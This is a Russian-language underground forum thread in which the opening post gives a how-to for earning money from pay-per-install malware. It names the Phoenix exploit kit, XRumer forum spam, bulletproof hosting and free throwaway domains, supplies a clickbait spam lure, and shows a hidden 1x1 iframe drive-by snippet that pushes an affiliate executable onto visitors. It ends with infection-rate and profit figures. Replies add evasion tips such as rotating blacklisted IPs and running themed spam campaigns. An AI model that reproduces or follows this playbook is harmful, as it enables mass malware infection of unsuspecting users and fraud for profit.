Заработок на инсталах в "пассивном" режиме

Forum Library

Professional
Messages
1,168
Reputation
195
Reaction score
483
Points
83
Привет всем!
Хочу просто высказать свои мысли тем самым рассказав , о заработке на инсталах, как таковом. Скажу сразу , что Америку я не открою, но что-то полезное вы сможете подчеркнуть. И так начну )
У меня есть 3 связки каждую я использую под свои цели , но сегодня пойдет разговор про ЮСА-Европа траф. Для этой цели я приобрел Феникс 2.4 на хорошем сео трафе пробив на миксе колеблется 30-35 %.
Что нам понадобится
1. Мозги )
2. Связка
3. Хрумер 5 платиновая(спамер по форумам блогам гостевым книгам)
4. Траф
5. Хост абузоустойчивый
Ну все по порядку начнем с цен
1. Мозги - бесплатно
2. Связка феникс - 2.2 к $
3. Хрумер - 540 $
4. Траф - Хрумер
5. Хост - 150 $ мес.
Да вложения не малые , но это с какой стороны посмотреть ) Имея данный боекомплект можно окупится в теч мес , а то и быстрее.
На данной площадке уже описано, что такое инсталлы и с чем их едят и откуда они берутся . Мы этот шаг пропустим .
И так наша цель - траф-инсталы-$$$
Хочу рассказать о ПП специализирующихся на подмене выдачи. В хорошей партнерке можно иметь до 400 $ с 1 к ЮСА инсталлов в теч мес.
Считаем что у нас все купленно и все установлено. В хрумере
есть в комплекте база забугор форумов 150к . Вот с них мы и будем тянуть траф. + в хрумере в комплекте есть прога для сбора баз форумов. Я использовал базу хрумера+ напарасил еще 100к форумов.
Когда хрумак находится в полной боевой готовности надо составить правильный текст рассылки это играет большую роль. Кстати домен на халяву я беру здесь cz.cc - ни надо покупать абузоустойчивых, все равно упадет.
на данном этапе у нас :
1. Хрумер готовый к работе
2. Прикреплен домен к хосту
3. Вы нашли ПП скачали exe и загрузили его на связку.
Можно начинать
Я вообще делал так на нашем сайте ни-какого текста кроме
Sorry the site is not working. Данный текст видит юзер посетивший сайт
Но на этом сайте стоит наш код iframe -
<iframe src="здесь ваша ссылка для слива трафа" width="1" height="1"> . Как только пользователь попадет на ваш сайт ваш сплойт, связка попытается подгрузить жертве ваш exe.
Теперь приведу текст который я использовал при рассылке через хрумак:
Our planet is approaching asteroid, declassified archives special services! (((
Click here for details
Теперь о цифрах:
Проспамленно было 250 к форумов. 2 разными текстами.
За 3 дня они мне дали 150 к уникального трафа - да именно такой конверт у меня был.
Связка сработала на отлично и средний пробив держался 33 % это мне дало почти 50к инсталлов. В ПП попало конечно меньше примерно 70 % примерно 30к установок )) На миксовом трафе выходит в среднем 150 $ в мес с 1 к. А это на выходе = 30 * 150 = 4500 $ . Что окупает наши вложения .
ПС. Все не так просто , как кажется ) Но скажу и не чего сложного. Можете задавать любые вопросы по мере их поступления буду пытатся отвечать ) , а и чуть не забыл собираем базу, спамим каждый день новые форумы , ведь форумы дают уников много только после 1 проспама ) Почему в пасивном ? Просто плотно поработав 5 дней ПП будет нести вам деньги в теч месяца. А вы уже можете ни чего не делать.

(c) forall
 

stink

Professional
Messages
509
Reputation
25
Reaction score
47
Points
28
1)если собирать базы отдельно,то имеет смысл. база которая идет в комплекте с хруммером сильно засранна.

2)насчет хостинга - мне кажется лучше взять абузоустойчвый сервер под связку, и когда айпишник будет падать в блеки, менять его.

3)лучше собирать тематические базы, и спамить по тематике - например, если у вас есть авто база, то взять какую нибудь новость про новую модель машины, проспамить со ссылкой на "продолжение".
 

netan

Member
Messages
14
Reputation
0
Reaction score
0
Points
1
а как вот скажем быть если партнерка дает связку, на ней всегда чистый .exe , мы льем траффик на сайт (спамим по базе) и в один сука прекрасный момент домен запаливаеться и выходит часть трафа остаеться в проебе ...брать новый домен и продолжать рассылку?
 

seomagnit

Carder
Messages
57
Reputation
-2
Reaction score
4
Points
8
а где взять эту самую парнёрку которой это нужно? а также без хрумака можно как-то обойтись?
 
Top